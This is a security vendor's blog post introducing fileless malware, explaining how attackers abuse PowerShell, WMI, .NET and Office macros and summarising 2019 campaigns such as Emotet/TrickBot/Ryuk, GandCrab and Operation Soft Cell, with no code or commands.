Cybereason Blog | Cybersecurity News and Analysis

Fileless Malware 101: Understanding Non-Malware Attacks

Written by Cybereason Team | Sep 17, 2019 10:00:00 AM

What is Fileless Malware?

Unlike file-based attacks, fileless malware does not leverage traditional executable files. Fileless attacks abuse tools built-in to the operating system to carry out attacks. Essentially, Windows is turned against itself.

Without an executable, there is no signature for antivirus software to detect. This is part of what makes fileless attacks so dangerous - they are able to easily evade antivirus products.

Defend against these attacks by leveraging the MITRE ATT&CK framework. Read how to create a closed-loop security process in five steps with ATT&CK.

Fileless attacks use a technique called  living-off-the-land. Living-off-the-land is when attackers use legitimate tools for malicious purposes, and has been around for at least twenty five years. The abused, legitimate tools are known as LOLBins, and can include Microsoft Office Macros, PowerShell, WMI, and many more system tools. 

How does fileless malware work?

Fileless malware leverages trusted, legitimate processes (LOLBins) running on the operating system to perform malicious activities like lateral movement, privilege escalation, evasion, reconnaissance, and the delivery of payloads.

In our research, we have come across and prevented or detected many cases of fileless attacks just in 2019 alone. We have seen attackers use a range of default Windows processes in their attacks, including:

This is not nearly an exhaustive list of processes used for fileless attacks. However, these are LOLBins that we want to highlight because we can prevent these fileless attacks effectively and better than anyone else out there.

REASONS TO USE FILELESS MALWARE IN AN ATTACK

  • Stealthy: Fileless malware uses legitimate tools, which means it is almost impossible to blocklist the tools used in a fileless attack.
  • Living-off-the-land: The legitimate tools used for fileless malware are installed by default. The attacker does not need to create or install any custom tools to use them.
  • Trusted and Frequented: These tools are frequently used and trusted. It is not unusual to see the tools used in fileless malware running in an enterprise environment for a legitimate purpose.

LOLBINS LEVERAGED BY FILELESS MALWARE

There are more than 100 Windows system tools that can be leveraged and abused as LOLBins.  

PowerShell

PowerShell is a cross-platform, open source task automation and configuration management framework created by Microsoft. 

The PowerShell framework, based on .NET, is made up of a command-line shell and scripting language. PowerShell gives full access to many Windows system functions, including WMI and component object model (COM) objects, as well as management features for the Microsoft Exchange server and others. Further, it is able to execute payloads directly from memory, which is what enables attackers to leverage it for fileless malware. 

What is PowerShell legitimately used for?

PowerShell is meant to be used as a tool to automate. It is a saving grace for administrators to automate tedious, repetitive tasks. PowerShell is powerful. You can use PowerShell to display all installed USB devices on all computers on the network. You can use it to set a task running in the background. You can use it to kill processes or export information about a machine. This is what makes PowerShell so critical for IT administrators. They can automate away many of the tasks they need to accomplish to focus on other tasks. This makes it nearly impossible to blocklist, as IT administrators need it on a daily basis.

Why use PowerShell for fileless attacks?

PowerShell gives attackers quick access to system functions of the operating system and is accepted as a legitimate, trusted tool. 

There are many reasons attackers use PowerShell for fileless attacks, including:

  • Installed By Default: PowerShell is installed by default on Windows.
  • Trusted and Frequented: Sysadmins frequently use and trust PowerShell. It is not unusual to see a PowerShell process running in an enterprise environment.
  • Easy to Obfuscate: PowerShell scripts are easy to obfuscate and can be difficult to detect with legacy security tools.
  • Gives Remote Access: PowerShell has remote access capabilities available by default, so attackers can use it remotely. 

Consider how much easier it is for an attacker to use an existing tool like PowerShell that has functionality built into it to not only communicate externally with the attacker, but also make a wide array of changes directly to the operating system. This is the potential of using PowerShell for attacks.

Which attacks used PowerShell?

  • Operation Cobalt Kitty: In 2017, the Cybereason Nocturnus team uncovered a massive campaign against corporations based in Asia. These attackers used a fileless PowerShell-based infrastructure with custom PowerShell payloads as part of the operation which ultimately steal proprietary business information. 
  • The Ramnit Banking Trojan: In 2019, the Cybereason Nocturnus team uncovered a severe threat to a customer while onboarding them to our Active Threat Hunting Service. This attack executes a PowerShell command from remote servers as part of the operation that ultimately exfiltrates sensitive data including banking credentials.
  • The New Ursnif Variant Targeting Japan: In 2019, the Cybereason Nocturnus team uncovered a new variant of the prolific Ursnif trojan with enhanced features. This variant uses a fileless technique with PowerShell to check language settings on the target machine. The PowerShell command is executed by a malicious macro that makes use of the .NET Framework. This attack steals data from mail clients and email credentials stored in browsers, specifically targeting banking customers. 
  • Triple Threat: Emotet Deploys TrickBot to Steal Data and Spread Ryuk: In 2019, the Cybereason Nocturnus team uncovered a threat affecting multiple customers that made use of three different major malware: Emotet, TrickBot, and Ryuk. This variant uses a malicious macro to execute PowerShell commands that download the Emotet payload. This attack not only exfiltrates a range of sensitive data, but also drops the Ryuk ransomware to cause further damage.
  • The Fallout Exploit Kit Stays Active: In 2019, the Cybereason Nocturnus team identified an attack that used everyday Internet browsing to install malware. This attack uses PowerShell to execute the final AZORult information stealer payload. By using PowerShell, it bypasses the Antimalware Scan Interface protection mechanism in Windows. The InfoStealer exfiltrates personal data like bitcoin, sensitive files, login data, and more.
  • Sodinokibi: The Crown Prince of Ransomware: In 2019, the Cybereason Nocturnus team analyzed a new type of ransomware, Sodinokibi. This attack uses PowerShell and .NET to load and execute the malware. This attack is used to deploy ransomware, which can cause severe damage to organizations and individuals. 

Windows Management Instrumentation (WMI)

Windows Management Instrumentation (WMI) is a Microsoft standard for accessing management information about devices in an enterprise environment. WMI has been ingrained in the Windows operating system since Windows NT 4.0 and Windows 95

What is WMI legitimately used for?

WMI is all about the management of Windows devices on a network. It can give you information about the status of local or remote machines, and can be used to configure security settings like system properties, user groups, scheduling processes, or disabling error logging. WMI is valuable to administrators that need to easily manage all machines on the network - a task that happens regularly in an enterprise. This management is critical for the success of an IT department, which makes it impossible to remove from their day-to-day life.

Why use WMI for fileless attacks?

The earliest, most mainstream use of WMI for malicious purposes was in Stuxnet. Since then, it has been regularly adopted by attackers for reconnaissance, antivirus detection, code execution, virtual machine detection, lateral movement, persistence, and data theft. 

There are many reasons attackers use WMI for fileless attacks, including:

  • Installed By Default: WMI is installed by default on Windows.
  • Trusted and Frequented: Sysadmins frequently use and trust WMI. It is not unusual to see WMI used in an enterprise environment.
  • Runs as System: Any permanent WMI event subscriptions run as SYSTEM, giving them more credibility.
  • Easily Triggered: Almost every operating system action can trigger a WMI event, making it incredibly easy to use in conjunction with operating system actions. 

For an in-depth explanation of using WMI for fileless attacks, read Abusing WMI to Build a Persistent, Asynchronous, and Fileless Backdoor.

Which attacks used WMI?


  • GandCrab’s Evasive Infection Chain: In 2019, the Cybereason Nocturnus team detected and prevented a campaign against an international, Japan-based company. This attack used a malicious macro as a trigger to decrypt the payload and a WMI object to set environment variables. This attack ultimately ransoms the target machine. The GandCrab ransomware is responsible for 40% of ransomware infections globally.
  • Adobe Worm Faker Delivers Customized Payloads: In 2019, the Cybereason Nocturnus team found an active malware that dynamically changed its behavior depending on the target machine. The attack used WMI methods to gather information about the target machine and to gather information about existing AV products on the target machine. The main goal of this attack is to exfiltrate customer information like financial data and passwords. 
  • Operation Soft Cell: In 2019, the Cybereason Nocturnus team uncovered a massive operation targeting telecommunications providers across the globe. The attack used WMI commands to move laterally across the network. This attack exfiltrated data like call detail records from telecommunications providers for years before being found. 
  • Exploit Kits Shade Into New Territory: In 2019, the Cybereason Nocturnus team observed the Spelevo exploit kit in the wild. This attack used WMI to successfully execute its payload. This attack was used for click fraud, a deviation from its ransomware roots. 

.NET Framework

.NET is an open source framework, or set of generic, commonly used and editable functionality, made by Microsoft. It has two main components that developers use together to create applications: the Common Language Runtime and the .NET Framework Class Library. Programs written for the .NET framework execute in the software environment Common Language Runtime. .NET was first released in beta as of late 2000. Since then, it has gained popularity not only as a framework, but as an open source developer platform to build web, mobile, and desktop applications, as well as more specific application models.

What is .NET legitimately used for?

.NET is a framework built by Microsoft to develop a wide range of applications. It gives access to an infrastructure of functions that developers use frequently and can build off of. It is used with several programming languages, including C#, VB.NET Shop, C++, and F#. It can be used to create Windows-based applications, cloud applications, artificial intelligence applications, or even cross-platform applications. 

For example, you can use .NET to ping another IP address on the network, or create a new process. .NET can be used to allocate memory, create a new thread, or write shellcode.  These are just a few examples of the tens of thousands of ways you can use .NET in an application. 

Why use .NET for fileless attacks?

.NET is an impressive framework: .NET applications can be run on multiple platforms and architectures. It saves developers time, and give them easy access to core machine functionality. To put things into perspective, PowerShell is built on top of the .NET Framework. Without .NET, there is no PowerShell. But it is often used unrelated to PowerShell for fileless attacks as well. 

There are many reasons attackers use .NET for fileless attacks, including:

  • Installed By Default: .NET is installed by default on Windows.
  • Trusted and Frequented: .NET has a community of developers around it that use it for any number of trusted and frequently used applications. It is not an easy framework to remove from daily operations. 
  • Saves Time: .NET makes a lot of common tasks one might wish to perform easier, since the framework has tens of thousands of functions attackers can use to interact with the system. 
  • Easy to Implement: .NET is easy to use. There is a significant amount of documentation available to enable developers to build legitimate apps - information attackers can leverage for their own purposes. 

 

Which attacks used .NET?


  • The New Ursnif Variant Targeting Japan: In 2019, the Cybereason Nocturnus team uncovered a new variant of the prolific Ursnif trojan with enhanced features. This variant uses a fileless technique with PowerShell to check language settings on the target machine. The PowerShell command is executed by a malicious macro that makes use of the .NET Framework. This attack steals data from mail clients and email credentials stored in browsers, specifically targeting banking customers. 
  • Sodinokibi: The Crown Prince of Ransomware: In 2019, the Cybereason Nocturnus team analyzed a new type of ransomware, Sodinokibi. This attack uses PowerShell and .NET to load and execute the malware. This attack is used to deploy ransomware, which can cause severe damage to organizations and individuals. 

WHAT ARE MACROS?

In Microsoft Office, Macros are used to automate frequent tasks. They are typically created in Word documents or Excel spreadsheets as a series of commands grouped together to complete a task automatically. Many macros are made using Visual Basic for Applications and can be written by anyone, including software developers. 

What are macros legitimately used for?

Macros can be very beneficial, especially when used in Microsoft Excel documents. Any task that needs to be done repeatedly can be automated with a macro. For example, every month, accountants need to make a report on all overdue customer accounts. A macro can automate this task so that the macro automatically lists and marks overdue accounts. This saves the accountant time and effort that should be automated. This example happens often in enterprise environments. 

Why use macros for fileless attacks?

Using macros for fileless attacks is convenient, because they can easily be combined with phishing campaigns and social engineering techniques to trick a user. In an enterprise, receiving a Microsoft Word or Excel document is a common occurrence. Most individuals would not think twice about opening a Microsoft Word document from someone at their company, or a potential prospect. 

Malicious macros are also able to execute a variety of tasks, including running instances of PowerShell. From there, the attackers can use PowerShell to execute a variety of tasks including downloading a malicious payload.

There are many reasons attackers use macros for fileless attacks, including:

  • Installed By Default: Microsoft Office has the ability to use macros by default. However, macros are not enabled by default.
  • Trusted and Frequented: Enterprises frequently use and trust Microsoft Office. It is not unusual to receive a Microsoft Word or Excel document in an enterprise setting.
  • Easy to Implement: There is a plethora of available documentation on how to write macros, and Microsoft intentionally makes them easy to implement so anyone - regardless of technical background - can use them.
  • Operating System Agnostic: Macros are implemented with a particular application in mind, usually Microsoft Word or Excel, which means they can be largely operating system agnostic, and infect a computer running any operating system.

 

Which attacks used macros?


  • The New Ursnif Variant Targeting Japan: In 2019, the Cybereason Nocturnus team uncovered a new variant of the prolific Ursnif trojan with enhanced features. This variant uses a fileless technique with PowerShell to check language settings on the target machine. The PowerShell command is executed by a malicious macro that makes use of the .NET Framework. This attack steals data from mail clients and email credentials stored in browsers, specifically targeting banking customers. 
  • Triple Threat: Emotet Deploys TrickBot to Steal Data and Spread Ryuk: In 2019, the Cybereason Nocturnus team uncovered a threat affecting multiple customers that made use of three different major malware: Emotet, TrickBot, and Ryuk. This variant uses a malicious macro to execute PowerShell commands that download the Emotet payload. This attack not only exfiltrates a range of sensitive data, but also drops the Ryuk ransomware to cause further damage. 
  • TA505 Targets Financial Enterprises: In 2019, the Cybereason Nocturnus team uncovered a meticulously planned operation against a financial institution. This variant used a malicious macro to execute a Windows process to connect to a remote command and control server. This attack planted a backdoor on the system used to quietly exfiltrate as much data as possible.
  • GandCrab’s Evasive Infection Chain: In 2019, the Cybereason Nocturnus team detected and prevented a campaign against an international, Japan-based company. This attack used a malicious macro to decrypt the payload and a WMI object to set environment variables. This attack ultimately ransoms the target machine. The GandCrab ransomware is responsible for 40% of ransomware infections globally.

WHY IS DETECTION AND PREVENTION OF FILELESS MALWARE CHALLENGING?

Fileless malware depends on tools that are part of the daily workflow of enterprise professionals. Attackers know they can rely on a set of tools that are pre-installed on every Windows machine and are vital for the daily operations of the enterprise. Fileless malware also decreases the number of files on disk, which means signature-based prevention and detection methods will not be able to identify them. This makes it incredibly difficult for an analyst or security product to identify whether the tool is being used for malicious purposes or normal, day-to-day actions. Analysts must have an intimate understanding of their environment to be able to identify LOLBins at work.

This is one reason why fileless malware attacks have become so prevalent. We only expect them to become more common as attackers continue to iterate and share their techniques with the community, and as they potentially develop this malware for profit under a malware-as-a-service model.

How did we get such deep visibility into these attacks? Our Nocturnus team leveraged our world-class EDR. To learn how we do it, read our white paper on the Right Roles for SIEM and EDR.

OBSERVED FILELESS ATTACKS Of 2019

Attack

Type of Fileless Attack

Operation Cobalt Kitty

PowerShell

The Ramnit Banking Trojan

PowerShell

The New Ursnif Variant Targeting Japan

PowerShell, Macro, .NET

Triple Threat: Emotet Deploys TrickBot to Steal Data and Spread Ryuk

PowerShell

The Fallout Exploit Kit Stays Active

PowerShell

GandCrab’s Evasive Infection Chain

WMI

Adobe Worm Faker Delivers Customized Payloads

WMI

Operation Soft Cell

WMI

Exploit Kits Shade Into New Territory

WMI

 

  • Operation Cobalt Kitty: In 2017, the Cybereason Nocturnus team uncovered a massive campaign against corporations based in Asia. These attackers used a fileless PowerShell-based infrastructure with custom PowerShell payloads as part of the operation which ultimately steal proprietary business information. 
  • The Ramnit Banking Trojan: In 2019, the Cybereason Nocturnus team uncovered a severe threat to a customer while onboarding them to our Active Threat Hunting Service. This attack executes a PowerShell command from remote servers as part of the operation that ultimately exfiltrates sensitive data including banking credentials.
  • The New Ursnif Variant Targeting Japan: In 2019, the Cybereason Nocturnus team uncovered a new variant of the prolific Ursnif trojan with enhanced features. This variant uses a fileless technique with PowerShell to check language settings on the target machine. The PowerShell command is executed by a malicious macro that makes use of the .NET Framework. This attack steals data from mail clients and email credentials stored in browsers, specifically targeting banking customers. 
  • Triple Threat: Emotet Deploys TrickBot to Steal Data and Spread Ryuk: In 2019, the Cybereason Nocturnus team uncovered a threat affecting multiple customers that made use of three different major malware: Emotet, TrickBot, and Ryuk. This variant uses a malicious macro to execute PowerShell commands that download the Emotet payload. This attack not only exfiltrates a range of sensitive data, but also drops the Ryuk ransomware to cause further damage. 
  • The Fallout Exploit Kit Stays Active: In 2019, the Cybereason Nocturnus team identified an attack that used everyday Internet browsing to install malware. This attack uses PowerShell to execute the final AZORult information stealer payload. By using PowerShell, it bypasses the Antimalware Scan Interface protection mechanism in Windows. The InfoStealer exfiltrates personal data like bitcoin, sensitive files, login data, and more. 
  • GandCrab’s Evasive Infection Chain: In 2019, the Cybereason Nocturnus team detected and prevented a campaign against an international, Japan-based company. This attack used a malicious macro to trigger to decrypt the payload and a WMI object to set environment variables. This attack ultimately ransoms the target machine. The GandCrab ransomware is responsible for 40% of ransomware infections globally.
  • Adobe Worm Faker Delivers Customized Payloads: In 2019, the Cybereason Nocturnus team found an active malware that dynamically changed its behavior depending on the target machine. The attack used WMI methods to gather information about the target machine and to gather information about existing AV products on the target machine. The main goal of this attack is to exfiltrate customer information like financial data and passwords. 
  • Operation Soft Cell: In 2019, the Cybereason Nocturnus team uncovered a massive operation targeting telecommunications providers across the globe. The attack used WMI commands to move laterally across the network. This attack exfiltrated data like call detail records from telecommunications providers for years before being found.
  • Exploit Kits Shade Into New Territory: In 2019, the Cybereason Nocturnus team observed the Spelevo exploit kit in the wild. This attack used WMI to successfully execute its payload. This attack was used for click fraud, a deviation from its ransomware roots.
  • Sodinokibi: The Crown Prince of Ransomware: In 2019, the Cybereason Nocturnus team analyzed a new type of ransomware, Sodinokibi. This attack uses PowerShell and .NET to load and execute the malware. This attack is used to deploy ransomware, which can cause severe damage to organizations and individuals. 

For an even deeper dive on fileless malware using examples from our very own Nocturnus research team, click here.